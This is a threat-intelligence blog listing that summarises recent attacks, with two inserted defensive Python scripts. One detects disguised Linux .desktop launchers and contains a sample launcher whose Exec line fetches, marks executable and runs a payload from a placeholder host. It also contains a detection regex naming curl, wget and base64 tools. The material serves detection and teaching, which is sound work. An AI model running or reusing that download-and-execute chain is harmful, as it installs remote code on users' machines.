Cybersec Sentinel

Cybersec Sentinel: 30+ years of IT expertise, delivering clear, actionable cyber security insights.
Plex users urged to reset passwords after database compromise
Breach, Article, news, Plex

Threat Group: Unknown threat actor
Threat Type: Data Breach / Account Compromise
Exploited Vulnerabilities: Unauthorised access to Plex authentication database
Malware Used: None confirmed
Threat Score: 🔴 7.5 High – Large-scale exposure of account credentials with password reuse risks
Last Threat Observation: 8 September 2025
Overview: On 8 September 2025, Plex confirmed
2 min read
Windows under threat from Rustonotto Rust backdoor and Python loader operated by APT37

Threat Group: APT37 (ScarCruft / Ruby Sleet / Velvet Chollima)
Threat Type: Backdoor / Surveillance
Exploited Vulnerabilities: Spear-phishing via malicious Windows shortcut (LNK) and CHM help file vectors
Malware Used: Rustonotto (Rust-based backdoor), Chinotto (PowerShell), FadeStealer (Python-based stealer)
Threat Score: 5.5 🟠 Elevated
Justification: Combines multiple stages: stealthy Rust backdoor, multi-stage infection chain,
2 min read
Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control
Phishing

Threat Group: Transparent Tribe / APT36 / Mythic Leopard / G0134
Threat Type: Targeted phishing dropper, Linux desktop shortcut abuse, remote administration tool deployment, cyber espionage
Exploited Vulnerabilities: No public CVE exploitation confirmed. Abuse of Linux .desktop launcher behaviour, user execution, weak attachment controls, and trusted cloud storage delivery.
Malware Used: Sindoor Dropper
5 min read
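The entry above turns on the fact that a Linux .desktop launcher is an INI-style file whose Exec= line runs an arbitrary command while its Name= and Icon= can make it look like a document. The following triage script is an added example, not code from the article or from any analysis of Sindoor Dropper: it parses launcher files and flags the generic traits of a download-and-execute launcher (shell chain in Exec, document-style name, no visible terminal, a decoy opened with xdg-open). The two launcher files and the regular expressions are constructed for this example, not published indicators.

```python
import configparser
import re

# Hypothetical signatures for this example: shell fragments that fetch, mark
# executable and run a payload. Not indicators taken from any specific dropper.
SUSPICIOUS_EXEC = re.compile(
    r"\b(curl|wget|bash\s+-c|sh\s+-c|python3?\s+-c|base64\s+-d|chmod\s+\+x|nohup)\b")
# Launcher names that imitate an attachment the user expects to open.
DOCUMENT_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)\b", re.IGNORECASE)


def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] section as a dict with lower-cased keys.

    interpolation=None keeps %U/%f field codes literal; only '=' is a delimiter
    so URLs in Exec= are not split on ':'; strict=False tolerates repeated keys.
    """
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp["Desktop Entry"])


def assess_launcher(text: str) -> list:
    """List the suspicious traits found in one .desktop file (empty list = clean)."""
    entry = parse_desktop(text)
    exec_line = entry.get("exec", "")
    chain = bool(SUSPICIOUS_EXEC.search(exec_line))
    findings = []
    if chain:
        findings.append("exec runs a download/execute chain")
    if DOCUMENT_NAME.search(entry.get("name", "")):
        findings.append("name masquerades as a document")
    if chain and entry.get("terminal", "false").lower() == "false":
        findings.append("shell chain runs without a visible terminal")
    if chain and "xdg-open" in exec_line:
        findings.append("opens a decoy file alongside the payload")
    return findings


# Constructed sample launchers for this example (not real samples).
MALICIOUS = """[Desktop Entry]
Type=Application
Name=Operation_Brief.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL https://files.example.invalid/p -o /tmp/.x && chmod +x /tmp/.x && nohup /tmp/.x >/dev/null 2>&1 & xdg-open /tmp/decoy.pdf"
"""

BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, assess_launcher(sample))
```

Run it over files a user has dropped in ~/Desktop or ~/.local/share/applications, or over launcher files extracted from mail attachments and cloud-storage downloads. The Exec= regex is deliberately narrow and will miss obfuscated chains; the name and decoy checks are what usually give away a launcher that is pretending to be an attachment.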
Skype Delivered SCR and PIF Files Deploy GodRAT Malware in Financial Campaigns
Malware

Threat Group: Winnti (APT41) – suspected attribution based on code lineage and targeting
Threat Type: Remote Access Trojan (RAT)
Exploited Vulnerabilities: Social engineering via Skype delivering malicious .SCR and .PIF files containing steganographic shellcode in JPEGs and DLL sideloading
Malware Used: GodRAT – evolution of Gh0st RAT and AwesomePuppet, featuring plugin-based architecture
4 min read
Microsoft 365 Exchange Online Direct Send exploited for internal phishing campaigns
Phishing

Threat Group: Opportunistic and financially motivated actors targeting multiple sectors
Threat Type: Phishing and email infrastructure abuse
Exploited Vulnerabilities: Abuse of Microsoft 365 Exchange Online Direct Send feature; implicit trust of unauthenticated internal-looking emails; weak or unenforced SPF, DKIM, and DMARC
Malware Used: None required for initial access; follow-on payloads
4 min read
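The weakness in the entry above is that a message whose From: carries the tenant's own domain is trusted even though it arrived from an arbitrary host and passed neither SPF nor DKIM. The script below is an added example, not code from the article or from Microsoft: it reads the Authentication-Results header that Exchange Online stamps on inbound mail and flags internal-looking messages that failed both SPF and DKIM. The domain contoso.com, the three messages and their header values are constructed for this example.

```python
import email
import re
from email.utils import parseaddr

# Domain the tenant owns. Hypothetical value for this example.
ORG_DOMAIN = "contoso.com"

# Extracts method=verdict pairs (spf=fail, dkim=none, dmarc=pass, ...) from an
# Authentication-Results header.
AUTH_RESULT_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)


def parse_auth_results(header_value: str) -> dict:
    """Map each authentication method to its verdict; absent methods count as 'none'."""
    results = {"spf": "none", "dkim": "none", "dmarc": "none"}
    for method, verdict in AUTH_RESULT_RE.findall(header_value or ""):
        results[method.lower()] = verdict.lower()
    return results


def is_spoofed_internal(raw_message: str, org_domain: str = ORG_DOMAIN) -> bool:
    """True when From: claims the tenant's own domain but neither SPF nor DKIM
    passed. Mail injected through Direct Send from a host outside the tenant's
    SPF record and without a DKIM signature looks exactly like this, and a
    DMARC policy of p=none lets it through."""
    msg = email.message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    if from_domain != org_domain.lower():
        return False  # external sender: not an internal-looking spoof
    # A message may carry several Authentication-Results headers; merge them.
    auth = parse_auth_results("; ".join(msg.get_all("Authentication-Results", [])))
    return auth["spf"] != "pass" and auth["dkim"] != "pass"


def triage(messages) -> list:
    """Return the subjects of messages that look like spoofed internal mail."""
    return [email.message_from_string(m)["Subject"] for m in messages if is_spoofed_internal(m)]


# Constructed sample messages for this example (not captured traffic).
SPOOFED = """From: IT Helpdesk <helpdesk@contoso.com>
To: alice@contoso.com
Subject: Action required: password expiry
Authentication-Results: spf=fail (sender IP is 203.0.113.5) smtp.mailfrom=contoso.com; dkim=none (message not signed) header.d=none; dmarc=fail action=none header.from=contoso.com

Your password expires today. Reset it at the link below.
"""

LEGITIMATE = """From: Bob <bob@contoso.com>
To: alice@contoso.com
Subject: Lunch?
Authentication-Results: spf=pass (sender IP is 198.51.100.10) smtp.mailfrom=contoso.com; dkim=pass (signature was verified) header.d=contoso.com; dmarc=pass action=none header.from=contoso.com

Noon works for me.
"""

EXTERNAL = """From: Partner <news@example.net>
To: alice@contoso.com
Subject: Newsletter
Authentication-Results: spf=fail (sender IP is 203.0.113.9) smtp.mailfrom=example.net; dkim=none (message not signed) header.d=none; dmarc=none action=none header.from=example.net

Monthly update.
"""

if __name__ == "__main__":
    print(triage([SPOOFED, LEGITIMATE, EXTERNAL]))
```

The same condition (From: in the tenant's domain, SPF and DKIM both not pass) is what a transport rule or DMARC policy of p=reject should be catching; running the check over exported message headers shows how much of that traffic the tenant is currently accepting. Messages relayed by a legitimate on-premises device that is not in the SPF record will also be flagged, which is the point: those senders need to be added to SPF or moved to an authenticated connector before DMARC enforcement.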
Charon ransomware adopts APT style tactics to target Middle East public sector and aviation
Ransomware

Threat Group: Suspected China linked Earth Baxia affiliate or imitator
Threat Type: Ransomware
Exploited Vulnerabilities: None confirmed. Suspected spear phishing and DLL sideloading
Malware Used: Ransom.Win64.CHARON.THGBCBE
Threat Score: 🔴 High (7.5/10) – Advanced persistent threat style capabilities, targeted operations, destructive behaviours, and potential state alignment
Last Threat
3 min read
PXA Stealer Malware Uses Trusted Cloud Services to Exfiltrate Government and Education Credentials
Malware

Threat Group: Vietnamese-speaking cybercrime actors (possible overlap with CoralRaider)
Threat Type: Python-based Information Stealer (Infostealer)
Exploited Vulnerabilities: DLL sideloading, phishing ZIP archives, abuse of legitimate cloud services (Cloudflare Workers, Dropbox)
Malware Used: PXA Stealer
Threat Score: 🔥 Critical (9.0/10) – Due to advanced evasion, large-scale credential theft, and abuse of
3 min read